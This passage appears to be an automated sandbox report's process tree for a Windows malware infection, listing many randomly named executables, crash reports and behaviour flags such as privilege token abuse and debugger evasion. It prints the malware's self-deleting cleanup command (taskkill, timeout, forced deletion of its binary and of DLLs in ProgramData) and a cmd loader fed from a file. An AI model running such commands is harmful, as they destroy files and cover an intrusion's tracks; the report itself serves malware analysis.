        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8284
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:11128
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:572
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:11032
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8072
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4988
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6788
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10668
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:1808
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9780
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:1516
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9272
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:3000
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 28
        8⤵
        Program crash
        
        PID:6452
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7896
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6580
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5688
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7940
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10968
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6892
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9308
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6076
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6988
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8392
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5952
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6628
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5520
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10628
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6976
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5136
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10592
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10896
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9536
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9156
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:4556
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:1604
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6320
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8968
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6100
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7880
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7604
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 28
        8⤵
        Program crash
        
        PID:7352
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9576
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7440
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5148
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8132
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10664
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5000
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:4216
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10384
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:4356
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:2808
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8408
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8300
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:11540
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12260
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12900
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12616
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13092
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:932
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10840
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:1616
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 28
        8⤵
        Program crash
        
        PID:7412
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:3032
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12700
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5700
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8188
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:4504
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9232
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7940
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12832
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10604
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13768
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:1320
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13952
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13484
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9492
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9492 -s 28
        8⤵
        Program crash
        
        PID:12572
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13652
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10988
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12024
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13416
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:14020
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13236
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:14280
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9780
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:4704
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:5052
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12520
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13812
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:10592
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:8704
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12584
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:2668
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:11448
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:13264
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:3152
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:11492
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:12868
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:3068
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:11404
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:11824
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:6836
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:14588
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:15168
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:14648
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:9536
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:14940
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:14816
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:4952
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        
        C:\Users\Admin\Documents\Giyc9wHXHZXVayLRxBGvxuK1.exe
        7⤵
        
        PID:7576
      - C:\Users\Admin\Documents\3BKe7tn3OEgEmQqhwoxrXYw0.exe
        
        "C:\Users\Admin\Documents\3BKe7tn3OEgEmQqhwoxrXYw0.exe"
        6⤵
        
        PID:5292
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5292 -s 236
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:9948
      - C:\Users\Admin\Documents\rb_wOIqb51LNITuJnWG11Epv.exe
        
        "C:\Users\Admin\Documents\rb_wOIqb51LNITuJnWG11Epv.exe"
        6⤵
        
        PID:8016
      - C:\Users\Admin\Documents\lP5VvOw0EclvxU5xOOjVhqu6.exe
        
        "C:\Users\Admin\Documents\lP5VvOw0EclvxU5xOOjVhqu6.exe"
        6⤵
        
        PID:7200
        
        C:\Users\Admin\Documents\lP5VvOw0EclvxU5xOOjVhqu6.exe
        
        "C:\Users\Admin\Documents\lP5VvOw0EclvxU5xOOjVhqu6.exe" -u
        7⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        
        PID:8920
      - C:\Users\Admin\Documents\H34KeggglCXg0hP1KH5sVU0s.exe
        
        "C:\Users\Admin\Documents\H34KeggglCXg0hP1KH5sVU0s.exe"
        6⤵
        
        PID:7960
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 7960 -s 232
        7⤵
        Program crash
        
        PID:8256
      - C:\Users\Admin\Documents\h80b7SZNMOiYTeLFP70GqYnl.exe
        
        "C:\Users\Admin\Documents\h80b7SZNMOiYTeLFP70GqYnl.exe"
        6⤵
        Drops file in Program Files directory
        
        PID:3472
      - C:\Users\Admin\Documents\sDXUgO6rfnQcnXgefHnu9apA.exe
        
        "C:\Users\Admin\Documents\sDXUgO6rfnQcnXgefHnu9apA.exe"
        6⤵
        
        PID:572
      - C:\Users\Admin\Documents\wMeTfPzfonjo7403bOWaPUjx.exe
        
        "C:\Users\Admin\Documents\wMeTfPzfonjo7403bOWaPUjx.exe"
        6⤵
        
        PID:7260
        
        C:\Users\Admin\AppData\Roaming\7967340.exe
        
        "C:\Users\Admin\AppData\Roaming\7967340.exe"
        7⤵
        
        PID:4988
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 4988 -s 2004
        8⤵
        Program crash
        
        PID:4612
        
        C:\Users\Admin\AppData\Roaming\5245631.exe
        
        "C:\Users\Admin\AppData\Roaming\5245631.exe"
        7⤵
        Suspicious behavior: SetClipboardViewer
        
        PID:3720
        
        C:\Users\Admin\AppData\Roaming\8482576.exe
        
        "C:\Users\Admin\AppData\Roaming\8482576.exe"
        7⤵
        
        PID:9348
        
        C:\Users\Admin\AppData\Roaming\2141206.exe
        
        "C:\Users\Admin\AppData\Roaming\2141206.exe"
        7⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:9912
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9912 -s 2340
        8⤵
        Program crash
        
        PID:8516
        
        C:\Users\Admin\AppData\Roaming\7628318.exe
        
        "C:\Users\Admin\AppData\Roaming\7628318.exe"
        7⤵
        
        PID:9828
      - C:\Users\Admin\Documents\TbBjRY1KUkkXqsdgit8P2xmG.exe
        
        "C:\Users\Admin\Documents\TbBjRY1KUkkXqsdgit8P2xmG.exe"
        6⤵
        
        PID:1488
      - C:\Users\Admin\Documents\wGO9_je9uGisMCfoS9jBScNe.exe
        
        "C:\Users\Admin\Documents\wGO9_je9uGisMCfoS9jBScNe.exe"
        6⤵
        
        PID:7648
      - C:\Users\Admin\Documents\Fc00UOz12EnOjcybFq2ea9rb.exe
        
        "C:\Users\Admin\Documents\Fc00UOz12EnOjcybFq2ea9rb.exe"
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4972
        
        C:\Users\Admin\Documents\Fc00UOz12EnOjcybFq2ea9rb.exe
        
        "C:\Users\Admin\Documents\Fc00UOz12EnOjcybFq2ea9rb.exe"
        7⤵
        
        PID:9692
        
        C:\Users\Admin\Documents\Fc00UOz12EnOjcybFq2ea9rb.exe
        
        "C:\Users\Admin\Documents\Fc00UOz12EnOjcybFq2ea9rb.exe"
        7⤵
        
        PID:9076
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c taskkill /im Fc00UOz12EnOjcybFq2ea9rb.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\Fc00UOz12EnOjcybFq2ea9rb.exe" & del C:\ProgramData\*.dll & exit
        8⤵
        
        PID:1516
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        
        PID:6588
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /im Fc00UOz12EnOjcybFq2ea9rb.exe /f
        9⤵
        Kills process with taskkill
        
        PID:8060
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        9⤵
        Suspicious use of NtCreateProcessExOtherParentProcess
        Delays execution with timeout.exe
        
        PID:7444
      - C:\Users\Admin\Documents\zFj6dt0GovZ55_4kYJXU1a68.exe
        
        "C:\Users\Admin\Documents\zFj6dt0GovZ55_4kYJXU1a68.exe"
        6⤵
        
        PID:1896
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1896 -s 276
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:3056
      - C:\Users\Admin\Documents\Azy2tb3soEAaJY_jMEoHvHVr.exe
        
        "C:\Users\Admin\Documents\Azy2tb3soEAaJY_jMEoHvHVr.exe"
        6⤵
        
        PID:1660
      - C:\Users\Admin\Documents\oknkj3dgMfP3jsqyxrBoQt3z.exe
        
        "C:\Users\Admin\Documents\oknkj3dgMfP3jsqyxrBoQt3z.exe"
        6⤵
        Checks BIOS information in registry
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        
        PID:8044
- - C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe
    "C:\Program Files (x86)\SmartPDF\SmartPDF\note866.exe"
    3⤵
    PID:4004
- - C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe
    "C:\Program Files (x86)\SmartPDF\SmartPDF\LivelyScreenRecS3.0.exe"
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2252
  - - C:\Users\Admin\AppData\Local\Temp\tmpCAC3_tmp.exe
      "C:\Users\Admin\AppData\Local\Temp\tmpCAC3_tmp.exe"
      4⤵
      PID:6388
    - - C:\Windows\SysWOW64\dllhost.exe
        
        dllhost.exe
        5⤵
        
        PID:4956
    - - C:\Windows\SysWOW64\cmd.exe
        
        cmd /c cmd < Pei.xll
        5⤵
        
        PID:432
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd
        6⤵
        
        PID:7392
        
        C:\Windows\SysWOW64\findstr.exe
        
